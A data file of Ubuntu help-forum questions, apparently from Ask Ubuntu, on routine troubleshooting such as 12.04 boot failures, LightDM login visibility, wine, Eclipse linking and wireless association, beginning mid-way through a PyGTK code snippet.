combo.set_hexpand ( true ) window.connect ( `` destroy '' , lambda w : gtk.main_quit ( ) ) window.add ( combo ) window.show_all ( ) combo ( ) gtk.main ( ) any pointers on how to make the text entry editable in the glade code ?
139294	ubuntu 11.10 home folder places bar missing	today i noticed that my `` places '' are missing when i open home folder . i should see it if i open any folder . i do n't know how it 's called , you can see on this picture . the left side bar , that 's missing . can you help me how to retrieve it
139295	how can i edit a root file on a non-jailbroken ipad ?	i often have to boot into os x mode and use xcode and so on for some phonegap ios development but it would be much easier to just edit the javascript files i 'm working on in ubuntu , if that were possible . i know it is at least possible to access the files in read only without jailbreaking , but that was on os x with third party software . experimenting ifuse has so far been a failure - only yielding access to a few things , not the /var/ folder i need , and it looks like it 's author stopped working on it 2 years ago .
139299	not recieving ubuntu one verification code	its been a 3 months now that i have signed up for ubuntu one , but can not use it because i am not receiving the verification code . should i try with another email ? . i have read the other posted question about trying with many emails and still failing . what should i do now ?
139304	useradd seems to have failed in lubuntu 12.04	i am trying to add users in lubuntu 12.04 . i have followed the instructions here which amounts to : $ useradd username $ passwd username i entered the password twice , and everything seemed good . but when i try to use the username and password from the lubuntu login screen , it fails , simply returning to the login screen . ( note that this is not the 'incorrect password ' behavior that my working account displays . ) any ideas ?
139306	how to change `` show desktop '' effect ?	in ccsm i set `` super+d '' for showing desktop . everything is fine but the effect . it just fade in and out . how could i change the effect for `` show desktop '' ? thanks for your time !
139313	firefox window is distorted/broken after changing from fullscreen	i accidentally dropped firefox from full-screen to half-screen and set it to fullscreen again , but when i open firefox , it ... well , it does not look very ok ... well , when i click on the upper bar , it looks like that : here it seems that firefox is drawn too far left , when i enter an url , it does not show until it is long enough ... after another click in the bar , it is really full-screen ... how can i get rid of this problem ?
139314	netconsole error , eth0 does n't support polling	i am configuring netconsole on ubuntu 11.10 , but when i tried to load the module using modprobe , i got the following error : netconsole : etho does n't support polling , aborting netconsole : cleaning up anyone have any idea how to solve this issue ?
139319	can not update java plugin for google chrome	i keep getting the `` java plugin out of date '' box whenever i open a page with embedded java . i use the link provided , which has no auto-install . i 've unzipped the tarball into /usr/lib/jvm/ . i 've used chrome : //plugins to check the current version , extracted the path from the details to verify the correct file , and manually edited .config/google-chrome/default/preferences to update the information for java . when i reopen chrome , it overwrites that preferences file , thereby losing all the changes . i can not find any documentation on how to update this . it 's becoming rather frustrating , and is preventing me from using some software required by my school so i can view assignments , etc . the current path of the plugin : /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/libnpjp2.so the desired path of the plugin : /usr/lib/jvm/jre1.7.0_04/lib/amd64/libnpjp2.so any help would be greatly appreciated !
139320	enable graphics card in virtual box	i recently brought a new laptop with following configuration intel i5 2450 8 gb ddr3 ram nvidia geforce gtx 520 1 gb card i had setup a windows 7 virtual machine using virtualbox . i want to use my graphics card in virtual machine but the virtual machine is only showing 128 mb of video memory . i am using bumblebee and starting virtual machine using $ optirun vboxmanage startvm `` windows 7 please suggest me how should i use my graphics card for 3d acceleration in virtual machine .
139321	motorola s305 headphones on ubuntu 12.04 . they work perfectly on ubuntu 10.04 . why ? how to fix ?	i have a set of motorola s305 bluetooth head phones . these head phones work perfectly on ubuntu 10.04 64bit ( high and low quality , microphone as well ) . i tried ubuntu 11.04 and the head phones cause a kernel panic ( among other problems ) . reading the forums and bug lists , this might not be due to these specific head phones . i have now installed ubuntu 12.04 on a asus k53s series and the head phones are both visible and connect , however , there is no sound . with ubuntu 11.04 , sound was possible but only low quality ( hsp/hfp ) no high quality ( a2sp ) . with ubuntu 12.04 , both hsp/hfp and a2sp show up in the options but when i switch to the head phones as output in the sound preferences there is no sound . im using a cambridge silicon radio , ltd bluetooth dongle ( hci mode ) . hciconfig shows the following : hci0 : type : br/edr bus : usb bd address : ae:2d:22:00 : ff:00 acl mtu : 344:12 sco mtu : 180:16 up running pscan rx bytes:814 acl:0 sco:0 events:32 errors:0 tx bytes:634 acl:0 sco:0 commands:32 errors:0 there seems to be bug here . has anyone got these headphones working with both high/low qualities of sound ? thanks in advance .
139326	why does n't ubuntu load after installing via wubi on a raid 0 setup ?	i tried to install wubi on my raid 0 ( windows ) and it installs correctly but it does n't load ubuntu . no error message , just it 's doing nothing when starting to load !
139328	gparted will not let my edit and do changes to my partitions	i want to shrink my /dev/sda1 partition but gparted will not let me do any editing and alterations to anything . note that everything is in gray , so that i can not edit anything . how can i fix this ? i 'm using an hp 635 notebook pc for the record . thanks .
139329	where are passwords saved ?	this is a weird question to ask , but where are the passwords saved ? i mean they must be somewhere for comparing every time . so where are system and network passwords saved ?
139331	how do i copy program files from windows partition to my ubuntu partition	i am dual-booting windows 7 and ubuntu 12.04 and i play world of warcraft on my windows os . i 've been thinking about running wow in ubuntu but i have no idea how to copy the game files from the window partition to the ubuntu os partition . i 've downloaded wine for support of wow in ubuntu but i 'm kinda stuck here . so how do i copy wow in the wine directory ?
139342	remove entries of previously installed windows with wine	in my previous version , in natty i think , i installed ms office and some other windows software via wine . they have cluttered a lot of places including the open with and other mime related operations . is there a way to purge them and remove all wine based entries that now i have no wine program installed ? i want , if possible to purge all entries that have to do with wine . i installed/uninstalled them using wine . purging wine does not help tia
139344	hard-link /home/myuser to its new location ?	i moved my home directory to a subdirectory of a second ( mounted ) drive using usermod -d ... -m. now , most programs work fine , but a few ( dropbox , etc . ) do not . i believe this is because there is no /home/myuser directory any more , so programs that are hard-coded to look there fail . can i just create a hard link using ln -d ? it seems like hard links are problematic , and i 'm not even sure if i can create them across disks anyhow . but i 'd like to get this sorted out soon .
139345	will dual booting ubuntu alongside windows affect windows recovery or overall processing speed ?	i want to install ubuntu 11.10 on lenovo y560 as a dual boot alongside windows 7 . will this installation harm the auto recovery of windows 7 and how will it effect the processing speed ?
139352	how do i make a matlab launcher for unity ?	i 'm trying to install a matlab r2011a launcher for unity in ubuntu 12.04 . i 've tried this guide ( although i know it 's for 11.10 and mentions that even 11.10 is an unsupported os for matlab r2011a ) but without any satisfactory solution . this is my launcher file , /usr/share/applications/matlab.desktop : # ! /usr/bin/env xdg-open [ desktop entry ] type=application icon=/usr/share/icons/matlab.png name=matlab r2011a comment=start matlab - the language of technical computing exec=matlab -desktop categories=development ; i open the dash panel and search for `` matlab '' . this launcher is found among applications . i click it , and matlab 's splash screen shows up , but when it disappears the program does n't start . ( i 've verified with htop that no matlab-processes are running in the background either . ) if i add terminal=true to the launcher file , the program starts ok , and opens a terminal as well as matlab . however , both the terminal and matlab itself show up in the launcher area , with the matlab icon , so it looks like i have two matlab instances running when really it 's only one . ( actually , they show up as two different programs , and not just two instances of the same - the icons are independent , not grouped together . ) this is definitely not optimal . i had hoped to create a launcher i can lock to the launcher area , and then that same icon will be the icon for the active matlab instance when the program is running . how do i create a launcher for matlab that works as expected ? update : i was apparently a bit unclear on my symptoms , i 'll try to clarify a little . i 've also tried some suggestions from the answers , and further investigated what happens . my current setup ( a launcher file with terminal=true and exec=matlab -desktop -nosplash & ) renders the following behavior : i open dash by pressing the windows key on my laptop , and search for `` matlab '' . it finds the launcher named `` matlab r2011a '' . i click it . a terminal window opens , using the icon i referred to in the launcher file . almost immediately , matlab 's splash screen also opens , using the same icon ( and thus being grouped with the terminal window in the launcher ) . the splash screen disappears and , so does one of the icons in the launcher . the matlab desktop environment opens , using a different version of the icon which is displayed next to the icon for the terminal window ( not grouped with it ) . i can lock the terminal window 's icon to the launcher and successfully start matlab by clicking it , but it does n't feel optimal that i start the program with one icon , and switch to it with another . i 've also tried the following : exec without the ampersand & in the launcher command , but it did n't make a difference . executing matlab -nosplash manually from a terminal still shows the splash screen . ( what , then , does the nosplash option really do ? )
139356	corrupted mbr , mbr repair does not recognise	alright here 's how i got to this point . i tried to partition my external drive so that i could install multiple os 's on it , 3 linux distros , 1 being ubuntu , and a partition for windows . so i used gparted and the drives came out fine according to it , but when i booted into windows to check from their it showed most of them as raw , so thinking something went wrong i decided to boot into gparted again and just create a new partition table and start making new partitions again . now after i created the new partition table all things just started going to hell and i finally realized i somehow screwed up the mbr . now the drive is n't recognized by gparted half the time and it is unable to do anything to it . so one person recommended i use mbr repair to repair the mbr so i said sure , downloaded it and booted into it , and it recognized all my drives but the one with the corrupt mbr . i 've read you can manually repair the mbr and there are a few other tools that may be slightly better than mbr repair but i figured i 'd come here for a sound opinion . i also read something about somebody using the same make drive to copy it 's mbr and just replace the corrupted drives mbr , which makes me wonder , since i have ; seagate 500 gig goflex ( corrupted mbr ) , seagate 500 gig desktop freeagent ( fine ) and a seagate 250 gig portable expansion drive ( fine ) .
139361	ubuntu not finishing installing after reboot from windows installer	i 'm trying to install ubuntu on my desktop from the windows installer . it installs but once it finishes and says to reboot , i reboot my computer , and it gives me this : try ( hd0,0 ) : ntfs5 : no wuildr try ( hd0,1 ) : ntfs5 : no wuildr try ( hd0,2 ) : ntfs5 : no wuildr try ( hd0,3 ) : ntfs5 : no wuildr try ( fd0 ) : fat32 : no wubildr can not find grldr . it had once installed but never actually loaded so i uninstalled and reinstalled it and this is what i get now : it is a 64 bit windows 7 operating system
139364	i can not install any software	i am new to ubuntu . during installation of software from ubuntu software center it shows that there is no internet connection whereas i can access to any website . using terminal the same problem appears . i installed ubuntu 12.04 by windows installer . how can i solve the problem ?
139366	can i safely remove software sources added by software-center ?	in software sources i have two entries that say added by software-center ; credentials stored in /etc/apt/auth.conf . i can see on the uris that they are sources for software i have bought ( for 0 $ ) in the software center , and removed again . now i have a lot of sources , as i experiment with some ppas , so updating them ă­s not as fast anymore , so i would like to know if i can safely remove these entries , and still be able to install the software again later ?
139377	unable to install any updates through update manager/apt-get upgrade	i have been running ubuntu 12.04 for the past few weeks . i recently tried to download and install some files through the update manager . it located a few files , downloaded them , but then failed to install them . it gave the error : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libasn1-8-heimdal ' : input/output error i tried using apt-get upgrade but a similar error was produced : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : icedtea-6-jre-cacao icedtea-6-jre-jamvm openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib 5 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/34.6 mb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 80 % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libasn1-8-heimdal ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) any help would be greatly appreciated . thanks in advance . edit : here 's some extra information that may be useful . my original problem was that the ubuntu software centre would not open . i found that the update manager and synaptic package manager also failed to open . they all gave an error along the lines of : '' installarchives ( ) failed : dpkg : error : reading package info file '/var/lib/dpkg/available ' : input/output errorerror in function : '' after much googling i seemed to fix that problem as the package managers would open again . when i then tried to download and install any updates from the update manager i got the error at the beginning of this post .
139378	brasero burn error	i get an error when burning with brasero on a blank dvd . what would be the problem ? .. this the link to the error report : http : //ubuntuone.com/2ekl3hvv10vps0mzkvsoer braserolibburn scsi error condition on command 2ah write ( 10 ) : [ 3 0c 82 ] write error braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn libburn reported an error scsi error on write ( 536544,16 ) : [ 3 0c 82 ] write error braserolibburn called brasero_job_error braserolibburn finished with an error braserolibburn asked to stop because of an error error = 1 message = `` scsi error on write ( 536544,16 ) : [ 3 0c 82 ] write error '' braserolibburn stopping session error : scsi error on write ( 536544,16 ) : [ 3 0c 82 ] write error ( brasero_burn_record brasero-burn.c:2856 )
139385	software to convert midi to sheet music	i am a music student looking for software that can convert midi files to sheet music . ( is there ubuntu software like the windows programs notation musician '' or midinotate player . )
139387	how do you uninstall software added from the internet ?	i installed google chrome from the internet instead of ubuntu software center . how do you uninstall applications installed in this manner ?
139390	is there a way to track a run away process ?	recently i 've been getting a rather annoying problem , which seems to be linked to firefox-trunk , thunderbird-trunk , or possible compiz ( default 12.04 compiz with unity ) . at random ( it seems ) the system becomes unusable because the ram is suddenly full . i thought it was a firefox only problem ( with google+ - if you scroll it was doing this ) , but further investigation revealed other potential causes . i 've since disabled all addons and the problem has not yet occured ( at the time of writing ) - but i 'm waiting to see - because i had to start kdm just to log in ( lightdm freezes now thanks to having to kill the xserver twice ) . preramble aside - is there a way that i can track what process is going out of hand ( maybe by a log ? ) so i can fix it later ?
139394	can not boot after bios / uefi reset to defaults	i have a thinkpad x130e . i installed ubuntu 12.04 lts amd64 on it . all worked fine until yesterday . while diagnosing another issue i reset the bios / uefi to defaults . afterwards ubuntu did not boot any more . the thinkpad shows operating system not found and that 's it . did the bios / uefi reset somehow nuke grub ? if so how is that possible ? how do i fix it ?
139401	failed upgrade from 11.10 to 12.04 on an encrypted filesystem	okay , so i was running ubuntu 11.10 with a dm-crypt/luks encrypted file-system and just tried to update to 12.04 with the update manager . it downloaded all the necessary packages and started installing them and suddenly got this error with libc6 : i 'm upgrading to ubuntu 12.04 , and the installation is stuck at preparing libc6 because of this , i had a reboot in the middle of the upgrade because it clearly seemed to have completely crashed . after that , i can no longer boot ubuntu . it asks me for the password to open the encrypted partition , says it 's successful and i get the boot screen with the dots looping over and over again . the recovery mode does n't work at all . i tried booting on a 12.04 live cd to check if my partition was still there . it is but i ca n't seem to open it . ( i do n't know if the partition is corrupted or if it 's because the live cd is unable to open it ) . anyway , i 'm stuck and i fear i might have to format and reinstall everything ( which i do not want to do ) . does n't anybody have any pointers ? any tips ? any help would be greatly appreciated at this point . thanks .
139404	download updates extremely slow	i 've looked through the forum havent really found anything recent that pertains so i figured i would ask , im on a 25mbit connection i download around 2.2mb/s however my download speeds for download updates and software in ubuntu 12.04 is extremely slow , i went into the software center and changed to us as im in illinois usa and my download speed is still excruciating went from about 700b/s to 9000b/s is anyone aware of what is going on here ? are the servers really that slow ? took me like 4 minutes to download the whole ubuntu installation this is ridiculous pc : quad core 3.0ghz amd gt 440 1gb video card 12gb ram 2tb hdd
139405	how to downgrade wine ?	some windows applications work better under an older version of wine . from time to time it is even necessary to use a previous wine version in order to get an application to start . however , the repository provides only one version of it , and it may require some hassle to downgrade it . what is the best way of installing an older version of wine ?
139406	what happens to the automatic crash reports ?	i have already experienced more than a few crashes in ubuntu 12.04 . what happens to those reports ? what do i get from sending these time after time ? can i get some statistics somewhere on which applications crash the most ? would be awesome to get some quality metrics available .
139412	enabling a user ( created with adduser command ) for lightdm graphical login	i just installed ubuntu 12.04 amd64 on a new ( empty ) hard disk ( because the previous crashed ) since i am quite familiar with debian , i created two accounts with the adduser command . since i am also having an nfsv3 file system , i explictly gave user ids when creating them ( for simplicity , i keep the same user id on the home server , running debian ; the user names contain digits ; i 'm not using ldap ) , e.g . # grep bethy /etc/passwd bethy46 : x:501:501 : bethy xxx , ,,06123456 : /home/bethy : /bin/bash # grep bethy /etc/group bethy64 : x:501 : # grep bethy /etc/shadow bethy46 : $ 6 $ vq-wmuchmorethings-2o/:15479:0:99999:7 : : of course /home/bethy exists the actual user name is slightly different , and i am not showing the real entries ( for obvious privacy reasons ) however , these users do n't appear at graphical login prompt ( lightdm ) . and they exist in the system , they have entries in /etc/passwd & /etc/shadow and i ( partly ) restored their /home i 've got no specific user config under /etc/lightdm ; file /etc/lightdm/users.conf mentions # note : if you have accountsservice installed on your system , then lightdm # will use this instead and these settings will be ignored but i have no idea of how to deal with accountsservice thru the command line as you probably guessed , i really dislike doing administrative tasks thru a graphical interface ; i much prefer the command line what did i do wrong ? how can a user entry not appear in lightdm graphical login ? ( i need to have my wife 's user entry apparent for graphical login ) . i am not asking how to hide a user , but how to show it in lightdm graphical prompt work-around as i have been told in comments by nirmik and by enzotib , lightdm probably do n't show any users of uid less than 1024 . so i changed all the uid to be more than 8200 ( including on the debian nfs server ) and this made all the users visible at the graphical prompt . it is a pain that such a threshold is not really documented .
139414	firefox in ubuntu 12.04 stops recognize helvetica and others fonts	sunddely firefox stops recognize ttf . all text assigned to special fonts as helvetica is now presented with arial or other plain font.. the last changes registered in log of updates was on 03 may . i dont know what 's happening . someone knows it ? 012-05-03 15:08:38 upgrade firefox-globalmenu 11.0+build1-0ubuntu4 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:38 status half-configured firefox-globalmenu 11.0+build1-0ubuntu4 012-05-03 15:08:39 status unpacked firefox-globalmenu 11.0+build1-0ubuntu4 012-05-03 15:08:39 status half-installed firefox-globalmenu 11.0+build1-0ubuntu4 012-05-03 15:08:39 status half-installed firefox-globalmenu 11.0+build1-0ubuntu4 012-05-03 15:08:39 status unpacked firefox-globalmenu 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:39 status unpacked firefox-globalmenu 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:39 upgrade firefox 11.0+build1-0ubuntu4 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:39 status half-configured firefox 11.0+build1-0ubuntu4 012-05-03 15:08:39 status unpacked firefox 11.0+build1-0ubuntu4 012-05-03 15:08:39 status half-installed firefox 11.0+build1-0ubuntu4 012-05-03 15:08:41 status half-installed firefox 11.0+build1-0ubuntu4 012-05-03 15:08:41 status half-installed firefox 11.0+build1-0ubuntu4 012-05-03 15:08:41 status half-installed firefox 11.0+build1-0ubuntu4 012-05-03 15:08:42 status half-installed firefox 11.0+build1-0ubuntu4 012-05-03 15:08:42 status half-installed firefox 11.0+build1-0ubuntu4 012-05-03 15:08:42 status unpacked firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:42 status unpacked firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:42 upgrade firefox-gnome-support 11.0+build1-0ubuntu4 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:42 status half-configured firefox-gnome-support 11.0+build1-0ubuntu4 012-05-03 15:08:42 status unpacked firefox-gnome-support 11.0+build1-0ubuntu4 012-05-03 15:08:42 status half-installed firefox-gnome-support 11.0+build1-0ubuntu4 012-05-03 15:08:42 status half-installed firefox-gnome-support 11.0+build1-0ubuntu4 012-05-03 15:08:43 status unpacked firefox-gnome-support 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:08:43 status unpacked firefox-gnome-support 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:20 configure firefox 12.0+build1-0ubuntu0.12.04.1 < none > 012-05-03 15:09:20 status unpacked firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:20 status unpacked firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:20 status unpacked firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status unpacked firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status unpacked firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status half-configured firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status installed firefox 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 configure firefox-globalmenu 12.0+build1-0ubuntu0.12.04.1 < none > 012-05-03 15:09:21 status unpacked firefox-globalmenu 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status half-configured firefox-globalmenu 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status installed firefox-globalmenu 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 configure firefox-gnome-support 12.0+build1-0ubuntu0.12.04.1 < none > 012-05-03 15:09:21 status unpacked firefox-gnome-support 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status half-configured firefox-gnome-support 12.0+build1-0ubuntu0.12.04.1 012-05-03 15:09:21 status installed firefox-gnome-support 12.0+build1-0ubuntu0.12.04.1 twitter 's screenshot : before presented with helvetica , now with ugly arial font .
139418	multiple networks connected.which is considered ?	suppose i am connected to two networks- dsl connection . 2.mobile broadband . which one will be considered as the base one and will be used ? ? because both do get connected at the same time.. ! !
139420	problems with simple media player tutorial	i 'm following along with this tutorial , but came to a stopping point where the program has an issue with the lineif response == gtk.response_ok . this happens after clicking open , then selecting a directory and clicking ok . the error message is `` nameerror : global name 'gtk ' is not defined '' so i researched it and found that apparently we need to import a couple things : import pygtk pygtk.require ( `` 2.0 '' ) import gtk if i add this to the simplemediaplayerwindow.py , then the program wo n't run at all , giving an error message : /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type `pygtkgenericcellrenderer ' is smaller than the parent type 's `gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk i thought all these things were installed and configured properly during the installation of quickly . any suggestions ? on a side note , there are a few typos in the tutorial which may make it slightly difficult to follow . when deleting pre-existing containers from the window , it says `` navigate the list of children and delete label1 '' twice , but the second time it 's actually referring to label2 . `` find horizontal panes under the containers tab ... '' actually should read `` find paned under the containers tab ... '' ( maybe this changed with an updated version of glade ) . lastly ( so far ) , `` then add to your on_on_openbutton_clicked function '' there 's once too many on 's in that function name .
139422	chromium progress bar for unity	i remember reading about a unity progress bar for chromium . in 12.04 , i have the latest chromium installed from the software centre , but it does n't have a progress bar . is there one that can be installed / added ?
139424	is it safe to remove apport ?	do i break anything if i sudo apt-get purge apport i have my secret business plan for world domination and who knows what 's in a core dump ? i 've seen ubuntu ( in particular dconf ) recreate config settings . i know how to disable it but ca n't trust it to remain disabled . hence my question . yea yea i know know my different distro ... but i 'd like to use ubuntu if i can .
139431	unbind f10 in unity	the current ubuntu 12.04 does n't seem to allow me to unbind f10 . ( there are some similar questions that relate to older ubuntu versions ) . this is causing some problems with terminal mode software and games . i have tried 1 ) /desktop/gnome/interface inside gconf 2 ) `` edit > keyboard shortcuts '' inside terminal 3 ) the setting for alt+f10 in unity desktop plugin in ccsm . none of these can unbind f10 on my 12.04 systems . if this is a bug , i apologise for asking : i 'll go bug report it .
139434	wireless wo n't associate after 12.04 upgrade	i have a problem connecting to my wireless when i upgraded to 12.04 from 10.04 . i have the atheros 9285 card and it 's using the ath9k driver . the failure is : [ 3262.329542 ] wlan0 : authenticate with 00:26:88 : e6 : db:34 ( try 1 ) [ 3262.331556 ] wlan0 : authenticated [ 3262.361303 ] wlan0 : associate with 00:26:88 : e6 : db:34 ( try 1 ) [ 3262.365295 ] wlan0 : rx assocresp from 00:26:88 : e6 : db:34 ( capab=0x411 status=12 aid=0 ) [ 3262.365301 ] wlan0 : 00:26:88 : e6 : db:34 denied association ( code=12 ) [ 3262.385620 ] wlan0 : deauthenticating from 00:26:88 : e6 : db:34 by local choice ( reason=3 ) it occurs only when i connect to a router set to wpa tkip . works fine with wpa aes . is this a driver problem or something in nm ? i 've seen similar reports with other drivers . when this occurs , nm seems to report that i am connected for 30 sec ( though there is no connection ) so this may relate to other bug reports .
139436	can i disable chromium 's in-browser mp3 player ?	when i click on a link in chromium to an mp3 , can i make the default behavior be to download it and not to start playing it with some in-browser thing ? i 've disabled all of my plugins , so it 's not one of them trying to play the file . and i suppose i could always right-click or control-click or what have you -- but the problem is n't that i do n't know how to download the file ( if i were desperate and/or crazy i would just curl it ) , the problem is that chromium seems to think that one of its roles is to play mp3s for me . i just want to set it straight . chromium version : 18.0.1025.168 ( developer build 134367 linux ) ubuntu 11.10
139437	ubuntu 12.04 live cd wo n't boot	i run the installer and when it hits the nouveau video section i see it flash and try to load the desktop , but drops back to a cursor . it appears that the nouveau drivers are failing with my geforce gtx 550ti does anyone know if there is a work around to install ubuntu ?
139439	black screen on reboot after 12.04 installation	i installed ubuntu 12.04 , everything went fine during install , but when complete , every time i =boot up , i get a black screen . how do i correct the issue ?
139442	problem when attempting to put ubuntu one in panel ( 12.04 )	i wanted to put the ubuntu one icon in the panel so i could see the progress of my sync but when i try this is what i get ... . mohd-arafat-hossain @ tud : ~ $ sudo apt-get install ubuntuone-indicator [ sudo ] password for mohd-arafat-hossain : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntuone-indicator : depends : indicator-ubuntuone but it is not going to be installed e : unable to correct problems , you have held broken packages . i have done these following steps before i did the above > > sudo add-apt-repository ppa : rye/ubuntuone-extras sudo apt-get update i have scanned for broken packages in synaptic package manager but it shows that i have none . any help ?
139443	typing `fglrxinfo` command outputs `` command not found '' on 12.04	i have a simple question and i do not know if the answer is around , but i did not find it . my question is `` why whenever i type fglrxinfo in the terminal its says command not found and when i was on ubuntu 11.10 it was working correctly .
139446	how do i print the contents of a directory folder as an ordered list ?	if my memory serves me correctly , in the early '90s on a mac ( but not on any ms o/s ) , one could print a hardcopy as an ordered list of a folders contents . it occured to me that this is still a helpful thing for quickly printing out for condensed list where one hs many items such as docs , pics , music etc in a structured list . does anyone know if this is possible on ubuntu 's unity/frontend or if there is a small app in software centre . for now i can not find one and for certain work would be a great 'time saver ' instead of jotting down on paper with a pen . any directions much appreciated .
139447	rhythmbox wo n't play streaming flac files	my music collection is stored in flac format on a network-attached ubuntu server 12.04 box . i used to be able to play my music by streaming it over the network to my laptop which runs ubuntu 12.04 and rhythmbox . when i attempt to do so now , my system monitor shows that there is an average of 900kb of traffic on the network , the play indicator in rhythmbox moves , but i do n't get any sound . the files play just fine with movie player and , when i play them with movie player , there is only about 250kb of traffic on the network .
139455	eclipse not creating a binary file when building a simple program	i have a problem with linking and\or running a simple program in my eclipse . i 'll try to first give a full description of the setup i 'm using , to help identify the problem . please notice that this is my first experience with installing and setting up an operating system which is not windows , though i got to use some version of ubuntu on my campus . i created a new ubuntu virtual machine yesterday on vmware player . i provided it with the path to an image file of the installation disc of ubuntu 11.10 for 32 bit systems named `` ubuntu-11.10-desktop-i386.iso '' . the machine than went on to install ubuntu 11.10 on itself . afterwards i logged in ( using the unity-2d option ) and did some basic setup : first , i chose to install all the updates offered to me automatically by ubuntu ( around 400 ) . i let the thing download and install in the background , and when it finished , i restarted ( as i was requested ) . second , i ran `` sudo apt-get install python-software-properties '' . i ca n't remember why , but it was probably some part of a guide of how to install java on ubuntu . i than tried `` sudo add-apt-repository ppa : ferramroberto/java '' , which if i remember correctly did not work . the bash history than shows a run of `` sudo apt-get update '' , which i remember seemed successful in installing some stuff . again , the line originated in some tutorial or guide to installing java on ubuntu . i than went on to install the java version 6 jre using `` sudo apt-get install sun-java6-jdk sun-java6-plugin '' . this worked and made me happy ( as a latter `` java -version '' showed that java was installed ) - finally , the correct command was found ! than i unpacked the file `` eclipse-cpp-indigo-sr2-incubation-linux-gtk.tar.gz '' into my /usr/apps folder , and than moved it to the /opt/ folder ( i do n't remember where it 's located ) . finally , i installed g++ using the command `` apt-get install g++ '' . things looked good . i than created a simple helloworld program - i created a source file named `` try1.cpp '' and wrote in this code : # include < cstdio > int main ( int argc , char* argv [ ] ) { printf ( `` hello world1 ! /n '' ) ; return 0 ; } when i build the project using right click on the project and - > 'build project ' , i get the following input : **** build of configuration debug for project os.ex4 **** make all building file : ../try1.cpp invoking : gcc c++ compiler g++ -o0 -g3 -wall -c -fmessage-length=0 -mmd -mp -mf '' try1.d '' -mt '' try1.d '' -o `` try1.o '' `` ../try1.cpp '' finished building : ../try1.cpp building target : os.ex4 invoking : gcc c++ linker g++ -o `` os.ex4 '' ./try1.o finished building target : os.ex4 **** build finished **** i can see that the try.o object is created in the 'debug ' folder of the project , and i can also see that no binary file is created - both by the build log and the lack of it in the 'debug ' folder . that is why it is not surprising that when i try to run my project i get the next error message : `` launch failed . binary not found . '' so , what am i doing wrong ? i have the g++ compiler , and it 's compiling the code into object files correctly , so why no linking into a binary file is done ? i have an intact main function ... i 'll appreciate your help with solving this problem . thanks , shay
139457	what is the safe way to run apache	i installed apache according to the description given here . i want to know what is the safe way to run apache that means , it is impossible to run apache without using sudo , i want to know whether this is safe or is there a accepted way of running apache .
139460	12.04 taking very long time while installing on vmware workstation 7.1.1	i 'm trying to install ubuntu 12.04 desktop edition using vmware workstation 7.1.1 . ideally total installation should complete in an hour . but i 'm not sure why it 's taking very long time . i waited for 6 hours but still it did n't completed . so i tried to reinstall but faced the same issue 2nd time also . my laptop has below configuration : ram : 3 gb , free hard disk space on destination drive : 33 gb , hard disk space assigned to ubuntu while installing : 20 gb , ram assigned to ubuntu while installing : 512 mb , processor : intel core i3 , os : genuine windows 7 home ( 64 bit ) any idea why it is happening ? or any suggestion for other version of ubuntu which will be installed quicker .
139462	does it matter that wlan0 has changed its name to eth1 after i upgraded to 12.04 ?	after upgrading to 12.04 i can not see wlan0 as ny wireless connection . it 's now called eth1 . ifconfig and iwconfig also return the same : eth1 . is this okay , or should i make any changes ? $ iwconfig ppp0 no wireless extensions . lo no wireless extensions . eth1 ieee 802.11 access point : not-associated link quality:5 signal level:0 noise level:220 rx invalid nwid:0 invalid crypt:0 invald misc:0 eth0 no wireless extensions .
139469	ubuntu live boot not working on older laptop	when booting into ubuntu 11.04 from the pc , it works perfectly , but when i try to load it into a older laptop ( read ancient ) it gives a couple of kernel panic messages . i donnot know much about ubuntu , so sorry about any lack of information . the older laptop runs xp well enough for day to day use . laptop specs : hp compaq presario 2500 . intel pentium 4 . 2.52ghz processor . 448mb of ram . 64mb graphics i believe.. thanks in advance !
